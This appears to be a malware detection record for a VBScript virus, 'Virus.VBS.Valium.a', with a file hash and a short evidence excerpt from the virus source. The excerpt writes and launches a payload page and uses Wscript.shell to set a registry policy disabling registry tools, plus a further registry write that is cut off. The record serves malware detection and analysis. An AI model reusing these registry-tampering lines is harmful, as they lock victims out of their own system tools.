Virus.VBS.Valium.a
Detects obfuscated wscript.shell commands
SHA-2565e225649f1b22df45eb21cfeeac0849171af2b254d09676eac202d0d57c100a7
MaleculeTh
Evidence
138:115… infected with Valium virus by psychologic/redline</b></p>"
139 payload.writeline "</body></html>"
140 payload.close
141 CreateObject("Wscript.shell").run "C:\payload.html"
142end if
143
144CreateObject("Wscript.shell").regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
145createobject("Wscript.shell").regwrite "HKEY_CLASSES_ROOT\Directory\She …